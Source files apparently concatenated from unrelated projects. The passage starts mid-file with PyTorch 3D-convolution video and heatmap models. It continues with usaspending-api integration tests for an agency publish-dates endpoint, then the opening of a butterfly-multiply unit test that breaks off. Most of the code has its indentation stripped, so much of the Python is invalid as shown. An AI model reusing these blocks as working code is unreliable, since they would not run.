out = self.fc2(out)
out = self.fc(out)
return features, out
class C3D_VIDEO_V3(nn.Module):
def __init__(self,
sample_size,
sample_duration,
num_classes=600):
super(C3D_VIDEO_V3, self).__init__()
self.group1 = nn.Sequential(
nn.Conv3d(3, 32, kernel_size=3, padding=1),
nn.BatchNorm3d(32),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(1, 2, 2)))
self.group2 = nn.Sequential(
nn.Conv3d(32, 64, kernel_size=3, padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 3, 3), stride=(2, 2, 2)))
self.group3 = nn.Sequential(
nn.Conv3d(64, 128, kernel_size=3, padding=0),
nn.BatchNorm3d(128),
nn.ReLU(),
nn.Conv3d(128, 128, kernel_size=(3, 3, 3), padding=1),
nn.BatchNorm3d(128),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 3, 3), stride=(2, 4, 4)))
self.group4 = nn.Sequential(
nn.Conv3d(128, 256, kernel_size=(3, 3, 3), padding=1),
nn.BatchNorm3d(256),
nn.ReLU(),
nn.Conv3d(256, 256, kernel_size=(3, 3, 3), padding=0),
nn.BatchNorm3d(256),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 2)))
# self.group5 = nn.Sequential(
# nn.Conv3d(512, 512, kernel_size=3, padding=1),
# nn.BatchNorm3d(512),
# nn.ReLU(),
# nn.Conv3d(512, 512, kernel_size=3, padding=1),
# nn.BatchNorm3d(512),
# nn.ReLU(),
# nn.MaxPool3d(kernel_size=(1, 2, 2), stride=(2, 2, 2), padding=(0, 1, 1)))
last_duration = 2
last_size = 5
self.fc1 = nn.Sequential(
nn.Linear((256 * last_duration * last_size * last_size), 128),
nn.ReLU(),
nn.Dropout(0.5))
self.fc2 = nn.Sequential(
nn.Linear(128, 32),
nn.ReLU(),
nn.Dropout(0.5))
self.fc = nn.Sequential(
nn.Linear(32, num_classes))
def forward(self, x):
out = self.group1(x)
out = self.group2(out)
out = self.group3(out)
out = self.group4(out)
# out = self.group5(out)
out = out.view(out.size(0), -1)
out = self.fc1(out)
out = self.fc2(out)
out = self.fc(out)
return out
class C3D_VIDEO(nn.Module):
def __init__(self,
sample_size,
sample_duration,
num_classes=600):
super(C3D_VIDEO, self).__init__()
self.group1 = nn.Sequential(
nn.Conv3d(3, 32, kernel_size=3, padding=1),
nn.BatchNorm3d(32),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(1, 2, 2)))
self.group2 = nn.Sequential(
nn.Conv3d(32, 64, kernel_size=3, padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 3, 3), stride=(2, 2, 2)))
self.group3 = nn.Sequential(
nn.Conv3d(64, 128, kernel_size=3, padding=0),
nn.BatchNorm3d(128),
nn.ReLU(),
nn.Conv3d(128, 128, kernel_size=(3, 5, 5), padding=1),
nn.BatchNorm3d(128),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 3, 3), stride=(2, 4, 4)))
self.group4 = nn.Sequential(
nn.Conv3d(128, 256, kernel_size=(3, 5, 5), padding=0),
nn.BatchNorm3d(256),
nn.ReLU(),
nn.Conv3d(256, 256, kernel_size=(3, 5, 5), padding=0),
nn.BatchNorm3d(256),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 4, 4)))
# self.group5 = nn.Sequential(
# nn.Conv3d(512, 512, kernel_size=3, padding=1),
# nn.BatchNorm3d(512),
# nn.ReLU(),
# nn.Conv3d(512, 512, kernel_size=3, padding=1),
# nn.BatchNorm3d(512),
# nn.ReLU(),
# nn.MaxPool3d(kernel_size=(1, 2, 2), stride=(2, 2, 2), padding=(0, 1, 1)))
last_duration = 1
last_size = 1
self.fc1 = nn.Sequential(
nn.Linear((256 * last_duration * last_size * last_size), 128),
nn.ReLU(),
nn.Dropout(0.5))
self.fc2 = nn.Sequential(
nn.Linear(128, 32),
nn.ReLU(),
nn.Dropout(0.5))
self.fc = nn.Sequential(
nn.Linear(32, num_classes))
def forward(self, x):
out = self.group1(x)
out = self.group2(out)
out = self.group3(out)
out = self.group4(out)
# out = self.group5(out)
out = out.view(out.size(0), -1)
out = self.fc1(out)
out = self.fc2(out)
out = self.fc(out)
return out
class C3D_VIDEO_out(nn.Module):
def __init__(self,
sample_size,
sample_duration,
num_classes=600):
super(C3D_VIDEO_out, self).__init__()
self.group1 = nn.Sequential(
nn.Conv3d(3, 32, kernel_size=3, padding=1),
nn.BatchNorm3d(32),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(1, 2, 2)))
self.group2 = nn.Sequential(
nn.Conv3d(32, 64, kernel_size=3, padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 3, 3), stride=(2, 2, 2)))
self.group3 = nn.Sequential(
nn.Conv3d(64, 128, kernel_size=3, padding=0),
nn.BatchNorm3d(128),
nn.ReLU(),
nn.Conv3d(128, 128, kernel_size=(3, 5, 5), padding=1),
nn.BatchNorm3d(128),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 3, 3), stride=(2, 4, 4)))
self.group4 = nn.Sequential(
nn.Conv3d(128, 256, kernel_size=(3, 5, 5), padding=0),
nn.BatchNorm3d(256),
nn.ReLU(),
nn.Conv3d(256, 256, kernel_size=(3, 5, 5), padding=0),
nn.BatchNorm3d(256),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 4, 4)))
last_duration = 1
last_size = 1
self.fc1 = nn.Sequential(
nn.Linear((256 * last_duration * last_size * last_size), 128),
nn.ReLU(),
nn.Dropout(0.5))
self.fc2 = nn.Sequential(
nn.Linear(128, 32),
nn.ReLU(),
nn.Dropout(0.5))
self.fc = nn.Sequential(
nn.Linear(32, num_classes))
def forward(self, x):
out1 = self.group1(x)
out2 = self.group2(out1)
out3 = self.group3(out2)
out4 = self.group4(out3)
# out = self.group5(out)
out = out4.view(out4.size(0), -1)
out5 = self.fc1(out)
out6 = self.fc2(out5)
out = self.fc(out6)
return out5, out
class HeatmapPhaseNet(nn.Module):
def __init__(self,
sample_duration,
num_classes=600):
super(HeatmapPhaseNet, self).__init__()
self.net_azimuth = SubNet()
self.net_elevation = SubNet()
self.net_phase = PhaseNet()
last_duration = int(math.floor(sample_duration / 8))
last_size_h = 2
last_size_w = 2
self.fc1 = nn.Sequential(
nn.Linear((128 * last_duration * last_size_h * last_size_w + 96 * 20), 2048),
nn.ReLU(),
nn.Dropout(0.5)
)
self.fc2 = nn.Sequential(
nn.Linear(2048, 256),
nn.ReLU(),
nn.Dropout(0.5)
)
self.fc3 = nn.Sequential(
nn.Linear(256, 32))
self.fc = nn.Sequential(
nn.Linear(32, num_classes))
def forward(self, azi, ele, phase):
out_azi = self.net_azimuth(azi)
out_ele = self.net_elevation(ele)
out_phase = self.net_phase(phase)
# get output from heatmap and phase
out_heatmap = torch.cat((out_azi, out_ele), dim=1)
out_heatmap = out_heatmap.view(out_heatmap.size(0), -1)
out_phase = out_phase.view(out_phase.size(0), -1)
out = torch.cat((out_heatmap, out_phase), dim=1)
out = self.fc1(out)
out = self.fc2(out)
out = self.fc3(out)
out = self.fc(out)
return out
def get_fine_tuning_parameters(model, ft_portion):
    if ft_portion == "complete":
        return model.parameters()
    elif ft_portion == "last_layer":
        ft_module_names = ['fc']
        parameters = []
        for k, v in model.named_parameters():
            for ft_module in ft_module_names:
                if ft_module in k:
                    parameters.append({'params': v})
                    break
            else:
                # for/else: runs only when no ft_module matched -> freeze this parameter
                parameters.append({'params': v, 'lr': 0.0})
        return parameters
    else:
        raise ValueError("Unsupported ft_portion: 'complete' or 'last_layer' expected")
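To illustrate the selection rule in `get_fine_tuning_parameters` without building a real network, here is a self-contained sketch of the same logic (the mock names are ours): parameters whose names contain `'fc'` keep the optimizer's default learning rate, while everything else is frozen by pinning `lr=0.0` in its parameter group.

```python
def select_last_layer(named_params, ft_modules=("fc",)):
    """Mirror of the 'last_layer' branch, over (name, param) pairs."""
    groups = []
    for name, param in named_params:
        if any(m in name for m in ft_modules):
            groups.append({"params": param})              # trainable at default lr
        else:
            groups.append({"params": param, "lr": 0.0})   # frozen
    return groups

groups = select_last_layer([("group1.0.weight", "w1"), ("fc.0.weight", "w2")])
print(groups)
```

A list of dicts like this is exactly the per-parameter-group format PyTorch optimizers accept.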
if __name__ == '__main__':
    # Fall back to CPU when CUDA is unavailable so this smoke test still runs.
    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
    model = HeatmapPhaseNet(sample_duration=100, num_classes=7)
    # model = SubNet()
    model = model.to(device)
    input1 = torch.randn(8, 1, 100, 91, 10).to(device)
    input2 = torch.randn(8, 1, 100, 91, 10).to(device)
    input3 = torch.randn(8, 12, 10, 100).to(device)
    # output = model(input1)
    output = model(input1, input2, input3)
    print(output.size())
# --- File: usaspending_api/reporting/tests/integration/test_agencies_publish_dates.py
# --- from beboplove/usaspending-api (license: CC0-1.0)
import pytest
from model_mommy import mommy
from rest_framework import status
url = "/api/v2/reporting/agencies/publish_dates/"
@pytest.fixture
def publish_dates_data(db):
dabs1 = mommy.make(
"submissions.DABSSubmissionWindowSchedule", pk=1, submission_reveal_date="2020-01-01 00:00:00.000000+00"
)
dabs2 = mommy.make(
"submissions.DABSSubmissionWindowSchedule", pk=2, submission_reveal_date="2020-01-02 00:00:00.000000+00"
)
dabs3 = mommy.make(
"submissions.DABSSubmissionWindowSchedule", pk=3, submission_reveal_date="2019-01-01 00:00:00.000000+00"
)
dabs4 = mommy.make(
"submissions.DABSSubmissionWindowSchedule", pk=4, submission_reveal_date="2019-01-02 00:00:00.000000+00"
)
tas1 = mommy.make("accounts.TreasuryAppropriationAccount", funding_toptier_agency_id="001")
tas2 = mommy.make("accounts.TreasuryAppropriationAccount", funding_toptier_agency_id="002")
mommy.make("accounts.AppropriationAccountBalances", treasury_account_identifier=tas1)
mommy.make("accounts.AppropriationAccountBalances", treasury_account_identifier=tas2)
mommy.make(
"submissions.SubmissionAttributes",
submission_id=1,
toptier_code="001",
reporting_fiscal_year=2020,
reporting_fiscal_period=3,
reporting_fiscal_quarter=1,
quarter_format_flag=True,
published_date="2020-01-30 07:46:21.419796+00",
certified_date="2020-01-30 07:46:21.419796+00",
submission_window=dabs1,
)
mommy.make(
"submissions.SubmissionAttributes",
submission_id=2,
toptier_code="001",
reporting_fiscal_year=2020,
reporting_fiscal_period=7,
reporting_fiscal_quarter=3,
quarter_format_flag=False,
published_date="2020-05-02 07:46:21.419796+00",
certified_date="2020-05-02 07:46:21.419796+00",
submission_window=dabs2,
)
mommy.make(
"submissions.SubmissionAttributes",
submission_id=3,
toptier_code="001",
reporting_fiscal_year=2019,
reporting_fiscal_period=12,
reporting_fiscal_quarter=4,
quarter_format_flag=True,
published_date="2020-10-02 07:46:21.419796+00",
certified_date="2020-10-02 07:46:21.419796+00",
submission_window=dabs3,
)
mommy.make(
"submissions.SubmissionAttributes",
submission_id=4,
toptier_code="002",
reporting_fiscal_year=2019,
reporting_fiscal_period=11,
reporting_fiscal_quarter=4,
quarter_format_flag=False,
published_date="2020-08-02 07:46:21.419796+00",
certified_date="2020-08-02 07:46:21.419796+00",
submission_window=dabs4,
)
mommy.make(
"reporting.ReportingAgencyOverview",
toptier_code="001",
fiscal_year=2020,
fiscal_period=3,
total_budgetary_resources=100.00,
)
mommy.make(
"reporting.ReportingAgencyOverview",
toptier_code="001",
fiscal_year=2020,
fiscal_period=7,
total_budgetary_resources=50.00,
)
mommy.make(
"reporting.ReportingAgencyOverview",
toptier_code="001",
fiscal_year=2019,
fiscal_period=12,
total_budgetary_resources=200.00,
)
mommy.make(
"reporting.ReportingAgencyOverview",
toptier_code="002",
fiscal_year=2019,
fiscal_period=11,
total_budgetary_resources=300.00,
)
mommy.make(
"references.ToptierAgency", toptier_agency_id=1, toptier_code="001", name="Test Agency", abbreviation="TA"
)
mommy.make(
"references.ToptierAgency", toptier_agency_id=2, toptier_code="002", name="Test Agency 2", abbreviation="TA2"
)
mommy.make("references.Agency", id=1, toptier_agency_id=1)
mommy.make("references.Agency", id=2, toptier_agency_id=2)
def test_basic_success(client, publish_dates_data):
resp = client.get(url + "?fiscal_year=2020")
assert resp.status_code == status.HTTP_200_OK
response = resp.json()
assert len(response["results"]) == 2
expected_results = [
{
"agency_name": "Test Agency",
"abbreviation": "TA",
"toptier_code": "001",
"current_total_budget_authority_amount": 150.00,
"periods": [
{
"period": 2,
"quarter": 1,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 3,
"quarter": 1,
"submission_dates": {
"publication_date": "2020-01-30 07:46:21.419796+00",
"certification_date": "2020-01-30 07:46:21.419796+00",
},
"quarterly": True,
},
{
"period": 4,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 5,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 6,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 7,
"quarter": 3,
"submission_dates": {
"publication_date": "2020-05-02 07:46:21.419796+00",
"certification_date": "2020-05-02 07:46:21.419796+00",
},
"quarterly": False,
},
{
"period": 8,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 9,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 10,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 11,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 12,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
],
},
{
"agency_name": "Test Agency 2",
"abbreviation": "TA2",
"toptier_code": "002",
"current_total_budget_authority_amount": 0.00,
"periods": [
{
"period": 2,
"quarter": 1,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 3,
"quarter": 1,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 4,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 5,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 6,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 7,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 8,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 9,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 10,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 11,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 12,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
],
},
]
assert response["results"] == expected_results
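The `expected_results` fixtures in these tests repeat one "empty" entry for every fiscal period from 2 to 12; the quarter of period `p` is `ceil(p / 3)`. A hypothetical helper (ours, not part of the API under test) that generates those repeated entries:

```python
def empty_period(period):
    """One default period entry as used in the expected_results blocks."""
    return {
        "period": period,
        "quarter": (period + 2) // 3,  # ceil(period / 3) for positive ints
        "submission_dates": {"publication_date": "", "certification_date": ""},
        "quarterly": False,
    }

print([empty_period(p)["quarter"] for p in range(2, 13)])
```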
def test_different_agencies(client, publish_dates_data):
resp = client.get(url + "?fiscal_year=2019")
assert resp.status_code == status.HTTP_200_OK
response = resp.json()
assert len(response["results"]) == 2
expected_results = [
{
"agency_name": "Test Agency 2",
"abbreviation": "TA2",
"toptier_code": "002",
"current_total_budget_authority_amount": 300.00,
"periods": [
{
"period": 2,
"quarter": 1,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 3,
"quarter": 1,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 4,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 5,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 6,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 7,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 8,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 9,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 10,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 11,
"quarter": 4,
"submission_dates": {
"publication_date": "2020-08-02 07:46:21.419796+00",
"certification_date": "2020-08-02 07:46:21.419796+00",
},
"quarterly": False,
},
{
"period": 12,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
],
},
{
"agency_name": "Test Agency",
"abbreviation": "TA",
"toptier_code": "001",
"current_total_budget_authority_amount": 200.00,
"periods": [
{
"period": 2,
"quarter": 1,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 3,
"quarter": 1,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 4,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 5,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 6,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 7,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 8,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 9,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 10,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 11,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 12,
"quarter": 4,
"submission_dates": {
"publication_date": "2020-10-02 07:46:21.419796+00",
"certification_date": "2020-10-02 07:46:21.419796+00",
},
"quarterly": True,
},
],
},
]
assert response["results"] == expected_results
def test_filter(client, publish_dates_data):
expected_results = [
{
"agency_name": "Test Agency 2",
"abbreviation": "TA2",
"toptier_code": "002",
"current_total_budget_authority_amount": 300.00,
"periods": [
{
"period": 2,
"quarter": 1,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 3,
"quarter": 1,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 4,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 5,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 6,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 7,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 8,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 9,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 10,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 11,
"quarter": 4,
"submission_dates": {
"publication_date": "2020-08-02 07:46:21.419796+00",
"certification_date": "2020-08-02 07:46:21.419796+00",
},
"quarterly": False,
},
{
"period": 12,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
],
}
]
resp = client.get(url + "?fiscal_year=2019&filter=Agency 2")
assert resp.status_code == status.HTTP_200_OK
response = resp.json()
assert len(response["results"]) == 1
assert response["results"] == expected_results
resp = client.get(url + "?fiscal_year=2019&filter=a2")
assert resp.status_code == status.HTTP_200_OK
response = resp.json()
assert len(response["results"]) == 1
assert response["results"] == expected_results
def test_fiscal_year_required(client, publish_dates_data):
resp = client.get(url)
assert resp.status_code == status.HTTP_422_UNPROCESSABLE_ENTITY
response = resp.json()
assert response == {"detail": "Missing value: 'fiscal_year' is a required field"}
def test_publication_date_sort(client, publish_dates_data):
resp = client.get(url + "?fiscal_year=2019&sort=publication_date")
assert resp.status_code == status.HTTP_422_UNPROCESSABLE_ENTITY
response = resp.json()
assert response == {
"detail": "publication_date sort param must be in the format 'publication_date,<fiscal_period>' where <fiscal_period> is in the range 2-12"
}
dabs5 = mommy.make(
"submissions.DABSSubmissionWindowSchedule", pk=5, submission_reveal_date="2020-01-05 00:00:00.000000+00"
)
dabs6 = mommy.make(
"submissions.DABSSubmissionWindowSchedule", pk=6, submission_reveal_date="2020-01-06 00:00:00.000000+00"
)
mommy.make(
"submissions.SubmissionAttributes",
submission_id=5,
toptier_code="001",
reporting_fiscal_year=2019,
reporting_fiscal_period=3,
reporting_fiscal_quarter=1,
quarter_format_flag=True,
published_date="2020-01-28 07:46:21.419796+00",
certified_date="2020-01-02 07:46:21.419796+00",
submission_window=dabs5,
)
mommy.make(
"submissions.SubmissionAttributes",
submission_id=6,
toptier_code="002",
reporting_fiscal_year=2019,
reporting_fiscal_period=3,
reporting_fiscal_quarter=1,
quarter_format_flag=True,
published_date="2020-01-01 07:46:21.419796+00",
certified_date="2020-01-28 07:46:21.419796+00",
submission_window=dabs6,
)
mommy.make(
"reporting.ReportingAgencyOverview",
toptier_code="001",
fiscal_year=2019,
fiscal_period=3,
total_budgetary_resources=10.00,
)
mommy.make(
"reporting.ReportingAgencyOverview",
toptier_code="002",
fiscal_year=2019,
fiscal_period=3,
total_budgetary_resources=10.00,
)
resp = client.get(url + "?fiscal_year=2019&sort=publication_date,3&order=desc")
assert resp.status_code == status.HTTP_200_OK
response = resp.json()
assert len(response["results"]) == 2
expected_results = [
{
"agency_name": "Test Agency",
"abbreviation": "TA",
"toptier_code": "001",
"current_total_budget_authority_amount": 210.00,
"periods": [
{
"period": 2,
"quarter": 1,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 3,
"quarter": 1,
"submission_dates": {
"publication_date": "2020-01-28 07:46:21.419796+00",
"certification_date": "2020-01-02 07:46:21.419796+00",
},
"quarterly": True,
},
{
"period": 4,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 5,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 6,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 7,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 8,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 9,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 10,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 11,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 12,
"quarter": 4,
"submission_dates": {
"publication_date": "2020-10-02 07:46:21.419796+00",
"certification_date": "2020-10-02 07:46:21.419796+00",
},
"quarterly": True,
},
],
},
{
"agency_name": "Test Agency 2",
"abbreviation": "TA2",
"toptier_code": "002",
"current_total_budget_authority_amount": 310.00,
"periods": [
{
"period": 2,
"quarter": 1,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 3,
"quarter": 1,
"submission_dates": {
"publication_date": "2020-01-01 07:46:21.419796+00",
"certification_date": "2020-01-28 07:46:21.419796+00",
},
"quarterly": True,
},
{
"period": 4,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 5,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 6,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 7,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 8,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 9,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 10,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 11,
"quarter": 4,
"submission_dates": {
"publication_date": "2020-08-02 07:46:21.419796+00",
"certification_date": "2020-08-02 07:46:21.419796+00",
},
"quarterly": False,
},
{
"period": 12,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
],
},
]
assert response["results"] == expected_results
# --- File: tests/test_butterfly_multiply.py
# --- from iclr-anonymous/kaleidoscope (license: Apache-2.0)
import os, sys
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import math
import unittest
import torch
from butterfly import Butterfly
from butterfly.utils import twiddle_normal_to_fast_format
from cnn.models.butterfly_conv import ButterflyConv2d
from butterfly.butterfly_multiply import butterfly_mult_torch, butterfly_mult, butterfly_mult_inplace, butterfly_mult_factors
from butterfly.butterfly_multiply import butterfly_mult_untied_torch, butterfly_mult_untied
from butterfly.butterfly_multiply import butterfly_ortho_mult_tied_torch, butterfly_ortho_mult_tied
from butterfly.butterfly_multiply import butterfly_ortho_mult_untied_torch, butterfly_ortho_mult_untied
from butterfly.butterfly_multiply import bbt_mult_untied_torch, bbt_mult_untied
from butterfly.butterfly_multiply import bbt_ortho_mult_untied_torch, bbt_ortho_mult_untied
from butterfly.butterfly_multiply import butterfly_mult_conv2d_torch, butterfly_mult_conv2d
from butterfly.butterfly_multiply import bbt_mult_conv2d_torch, bbt_mult_conv2d
from butterfly.butterfly_multiply import butterfly_mult_untied_svd_torch, butterfly_mult_untied_svd
from butterfly.butterfly_multiply import butterfly_mult_conv2d_svd_torch, butterfly_mult_conv2d_svd
from factor_multiply import butterfly_multiply_untied_eval  # needed by test_butterfly_untied_eval below
from factor_multiply_fast import butterfly_multiply_untied_forward_fast
from factor_multiply_fast import butterfly_multiply_untied_forward_backward_fast
from factor_multiply_fast import butterfly_bbs_multiply_untied_forward_fast
from factor_multiply_fast import butterfly_bbs_multiply_untied_forward_backward_fast
from factor_multiply_fast import butterfly_ortho_multiply_untied_forward_fast
from factor_multiply_fast import butterfly_ortho_multiply_untied_backward_fast
from factor_multiply_fast import butterfly_odo_multiply_untied_forward_fast
from factor_multiply_fast import butterfly_odo_multiply_untied_backward_fast
from factor_multiply_fast import butterfly_odo_multiply_untied_forward_backward_fast
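The imports above pull in custom (mostly CUDA) kernels. As a readable reference for what a butterfly multiply computes, here is a minimal pure-PyTorch sketch of the untied case: m = log2(n) levels, each applying an independent 2x2 mix to element pairs at a given stride. The pair/twiddle layout chosen here is an assumption for illustration and may not match the library's exact convention; the identity-twiddle sanity check holds for any layout.

```python
import torch

def butterfly_step(twiddle_step, x, stride):
    """One level of 2x2 butterfly mixes at the given stride.
    twiddle_step: (nstack, n//2, 2, 2); x: (batch, nstack, n).
    Layout is illustrative, not necessarily the library's."""
    b, s, n = x.shape
    xg = x.reshape(b, s, n // (2 * stride), 2, stride)
    tg = twiddle_step.reshape(s, n // (2 * stride), stride, 2, 2)
    # mix each (hi, lo) pair with its own 2x2 twiddle matrix
    y = torch.einsum('sgkij,bsgjk->bsgik', tg, xg)
    return y.reshape(b, s, n)

def butterfly_mult_ref(twiddle, x, increasing_stride=True):
    """Compose m butterfly steps. twiddle: (nstack, m, n//2, 2, 2)."""
    m = twiddle.shape[1]
    for i in range(m):
        stride = 2 ** i if increasing_stride else 2 ** (m - 1 - i)
        x = butterfly_step(twiddle[:, i], x, stride)
    return x

# Sanity check: all-identity twiddles leave the input unchanged.
batch, nstack, n, m = 3, 2, 8, 3
eye = torch.eye(2).expand(nstack, m, n // 2, 2, 2).contiguous()
x = torch.randn(batch, nstack, n)
assert torch.allclose(butterfly_mult_ref(eye, x), x)
```

Each step is O(n) work, so the full product costs O(n log n) versus O(n^2) for a dense matrix-vector multiply, which is the point of the butterfly parameterization.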
class ButterflyMultTest(unittest.TestCase):
def setUp(self):
self.rtol = 1e-3
self.atol = 1e-5
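Every comparison below goes through torch.allclose with these tolerances, whose semantics mix relative and absolute error: elementwise, |a - b| <= atol + rtol * |b|. A quick illustration with the same rtol/atol values (the example tensors are made up):

```python
import torch

# torch.allclose(a, b, rtol, atol) passes iff |a - b| <= atol + rtol * |b| elementwise.
a = torch.tensor([1.00000, 100.00])
b = torch.tensor([1.00001, 100.05])
# 1e-5 <= 1e-5 + 1e-3 * 1.00001  and  0.05 <= 1e-5 + 1e-3 * 100.05
assert torch.allclose(a, b, rtol=1e-3, atol=1e-5)
```

This is why the tests below multiply both rtol and atol by 10 for large batch sizes: atomic-add accumulation order on the GPU makes gradients slightly less reproducible there.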
def test_butterfly(self):
batch_size = 10
n = 4096
nstack = 2
